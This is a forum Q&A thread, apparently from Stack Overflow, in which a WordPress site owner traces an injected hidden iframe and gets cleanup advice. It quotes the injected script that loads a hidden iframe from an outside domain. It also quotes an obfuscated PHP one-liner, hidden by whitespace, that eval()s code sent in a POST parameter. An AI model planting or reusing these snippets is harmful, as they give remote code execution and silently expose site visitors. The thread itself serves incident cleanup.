# Find iframe injection and remove from site

Tags: javascript, wordpress, iframe, code-injection, malware

I browsed my site and noticed scrolling that wasn't there before.

After inspecting I noticed there's an invisible iFrame.

After seeing the iframe in the source page I looked through all my site files and couldn't find the same line of code that was in the source.

I ran my site to look for malware but all is clean. I did have a warning from Google a few months ago but my host removed the malicious files and Google approved the clean up and still does. But now I'm seeing this invisible object with an url.

Source script:

```
<script language="JavaScript">
if(document.loaded) {
  showBrowVer();
} else {
  if (window.addEventListener) {
    window.addEventListener('load', showBrowVer, false);
  } else {
    window.attachEvent('onload', showBrowVer);
  }
}

function showBrowVer() {
  var divTag=document.createElement('div');
  divTag.id='dt';
  document.body.appendChild(divTag);
  var js_kod2 = document.createElement('iframe');
  js_kod2.src = 'http://24corp-shop.com';
  js_kod2.width = '250px';
  js_kod2.height = '320px';
  js_kod2.setAttribute('style','visibility:hidden');
  document.getElementById('dt').appendChild(js_kod2);
}
</script>
```

I see it is being brought in by `wp_head();` but I looked through it and didn't see anything suspicious.

Does anyone have tips on looking for this injection to manually remove it from my WP site?

Comment: Disable all your plugins and see if it is one of them adding it. If it is then activate each plugin one at a time until it appears again.

Comment: Did you see this code in your browser or is it included in the source code on your web server?

Comment: Saw it in the browser. 

I deactivated all the plugins one by one and it's still there.

Comment: have you find the correct answer??

Comment: possible duplicate of [Removing an injection using regex](http://stackoverflow.com/questions/26013782/removing-an-injection-using-regex)

Answer (score 0, accepted):

wp_head() itself is not being used at this case for spreading the "malign" code that is in your site. That code is elsewhere not on wp_head().

1 - Make a full backup of your current site (database + files)
2 - Deactivate all plugins and see if the malign code still exists.
2 - if the malign code still exists then check your themes folder.on your default theme go to functions.php and search through that file for that code, or base64 encrypted code, eval, includes, etc.
3 - if the malign code, does not exist, after you have deactivated all your plugins then this means that the malign code is on one of those plugins.

Use divide & conquer method to find firstly in which plugin is installed the malign code and after that identify the file that has the malign code.

Comment: It's not part of any of the plugins. So you're saying just tackle folder by folder file by file for this specific code? 

is there a specific key word or phrase I should try to find in each file? iframe? js_kods?

Comment: Install couple of plugins to help you find more easily where the malign code is installed.

- Exploit Scanner (https://wordpress.org/plugins/exploit-scanner/)

- GOTMLS (https://wordpress.org/plugins/gotmls/)

Comment: Great plugin. It came up with many base64, eval, and visibility:hidden lines. But nothing that looks like my source hack line.

Comment: Just looked closer through some site files and noticed a line a code hidden all the way spaced to the right side!!

    <?php     $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset    (${$s20}['qf0b08a'])){eval(${$s20}['qf0b08a']);}?>

Could this be something? I definitely never put it there.

Comment: Found this weird code in an admin.php in my themes folder. Looked through old backups of my theme and this file was never in my backup before. so I removed this file from my ftp but still no change to the iframe.

Comment: If you never putted it there, then for sure this was inserted from the shell script. I cant say for sure if this is all ... im sure that should be other scripts. Normaly in my past experience removing shell scripts from hacked sites, i always found backdoors hidden in hard places to find. Usually they are installed on functions.php (so check that file firstly manualy).

Could you give a link to your site (also, is the infection still active, should i use a virtual machine while accessing it or not)?

Comment: Thanks buddy I truly would appreciate that.
I added the GOTMLS system, found about 25 backdoor scripts and 3 threats BUT the path to these is not the WP subdirectory. One of the threats was similar to the odd stroupper code (last code added) which is making me think it might be used for some else :S so I deleted this one to see what happens, nothing though. The other 2 threats won't allow me to delete it, even with permission.

site is radonicrodgers. com

How would I be able to show you the log from Scanner?

Answer (score 1):

Free WP themes/plugins are notorious for using base64_encode to 'hide' malicious or unwanted code in the  source. Basically, they store the encoded text in one of the files, and then base64_decode it and render the result as html. I would try greppingsearching for base64_decode in the source to see if it's being done.

Comment: So using the plugin below, I came up with many base64 lines.
How would I try grepping searching for base64? sorry I'm not sure what that it.

Comment: So i suppose you have used Exploit Scanner (since thats the plugin that scans for base64 encrypted scripts).

The only thing you could do right now is to manualy scan (you should do it yourself if you think you could do it) each base64 reported file. If you think you cant do it yourself, post here the log of the exploit scanner report and will see what i can do.

For automated resolvation of your problems though you can even use GOTMLS. It has an anti virus integrated that scans for shell scripts and elemeninates them if found. You only need to connect your plugin with the GOTMLS system.

Comment: So pretty much I solved it or at least for now. I compared original WP files with mind today and noticed new lines of code hidden to the right of the scroll bar. The hack was in a couple of files in 'themes', 'uploads' and the main trouble maker planted himself right inside my WP root hidden in an index and info.php.

Too bad none of the malware plugins were able to identify the correct files. I'm just glad it's over now.

Answer (score 0):

I had the same problem. Many files were tempered, both in the theme directory and in the core files.
The main one causing the issue (the iframe code was injected right before the  tag) was the index.php in root folder.
There was a fake "eAccelerate" code injecting the encoded iframe.

I was able to detect that with WordFence plugin, it gave me the list of tampered files.

I'm investigating how the website got hacked, as I have latest versions of WP and plugins, any idea?